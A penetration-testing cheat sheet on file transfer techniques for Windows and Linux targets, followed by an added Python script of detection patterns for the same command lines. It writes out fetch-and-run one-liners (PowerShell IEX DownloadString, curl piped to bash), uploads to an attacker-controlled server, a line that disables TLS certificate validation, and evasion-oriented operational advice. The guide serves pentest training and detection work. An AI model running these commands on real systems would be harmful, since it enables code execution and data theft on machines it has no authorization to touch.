File Transfer Techniques for Pentesting
Overview
File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.
Common Challenges
Host-based Controls
Application whitelisting
AV/EDR blocking
Process monitoring
Network Controls
Firewall restrictions
IDS/IPS monitoring
Port filtering
Windows Transfer Techniques
PowerShell Methods
Base64 Transfer (No Network Required)
# On Attacker (Linux)
cat file | base64 -w 0
# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))
# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5
Web Downloads
# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')
# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')
# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>
SMB Transfer
# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support
# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe
# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test
FTP Transfer
# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write
# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')
# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')
Living Off The Land (LOtL) Binaries
WMIC
Bitsadmin
Certutil
Regsvr32
Linux Transfer Techniques
Base64 Transfer
# Encode
cat file | base64 -w 0; echo
# Decode
echo -n '<base64_string>' | base64 -d > file
# Verify
md5sum file
Web Transfer Methods
Download
# Wget
wget <URL> -O /path/to/file
# cURL
curl -o /path/to/file <URL>
# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3
Upload
# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure
# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
SSH/SCP Transfer
# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh
# Download
scp username@<IP>:/remote/file /local/directory
# Upload
scp /local/file username@<IP>:/remote/directory
Simple Web Server
# Python3
python3 -m http.server
# PHP
php -S 0.0.0.0:8000
Common Issues & Solutions
SSL/TLS Issues (Windows)
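# Accepts any server certificate (for example a self-signed one on a test server).
# The setting is process-wide and stays in effect until reset, so HTTPS no longer authenticates the server.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}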
Port Considerations
HTTP/HTTPS (80/443) - Usually allowed
SMB (445) - Often blocked
FTP (20/21) - May be filtered
SSH/SCP (22) - May require configuration
Security Best Practices
Transfer Verification
Always verify file integrity (MD5/SHA)
Check file permissions after transfer
Operational Security
Clean up temporary files
Remove credentials after use
Monitor for security alerts
Use encryption when possible
Fileless Operations
Prefer memory-only operations
Clean up artifacts
Be aware of logging/monitoring
Network Security
Use HTTPS/FTPS when available
Consider file size limitations
Monitor for AV/EDR alerts
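The commands in this guide leave recognizable command lines in process-creation and shell logs, which is what "Be aware of logging/monitoring" refers to. The following is an added example, not part of the original guide, that matches those command lines in a log; the rule names and the sample log lines are constructed for illustration.

```python
import re

# Rule names are hypothetical; each pattern mirrors a command shown on this page.
RULES = [
    ("ps_webclient_transfer",
     re.compile(r"Net\.WebClient\)?\.(DownloadFile|DownloadString|UploadFile)", re.I)),
    ("ps_fileless_iex",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString", re.I)),
    ("ps_invoke_webrequest_outfile",
     re.compile(r"Invoke-WebRequest\b.*-OutFile", re.I)),
    ("ps_base64_file_write",
     re.compile(r"WriteAllBytes\(.*FromBase64String", re.I)),
    ("ps_tls_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("sh_pipe_to_interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python3?)\b", re.I)),
    ("sh_base64_decode_to_file",
     re.compile(r"base64\s+(-d|--decode)\b.*>\s*\S+", re.I)),
    ("smb_unc_copy",
     re.compile(r"\b(copy|net\s+use)\b.*\\\\[^\\\s]+\\", re.I)),
]

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = r"""
powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')
powershell.exe Invoke-WebRequest http://192.0.2.10/t.zip -UseBasicParsing -OutFile C:\Temp\t.zip
powershell.exe [IO.File]::WriteAllBytes("C:\Temp\f.bin", [Convert]::FromBase64String("QUJD"))
cmd.exe /c copy \\192.0.2.10\share\file.exe
bash -c curl http://192.0.2.10/x.sh | bash
git pull origin main
""".strip().splitlines()

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return (line_number, rule_names) for each line with at least one hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            hits.append((number, names))
    return hits

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(names)}")
```

Plain `wget -O`, `curl -o` and `scp` transfers are deliberately not matched here because they are routine administrative activity; separating those from misuse needs destination and network context, not command-line text alone.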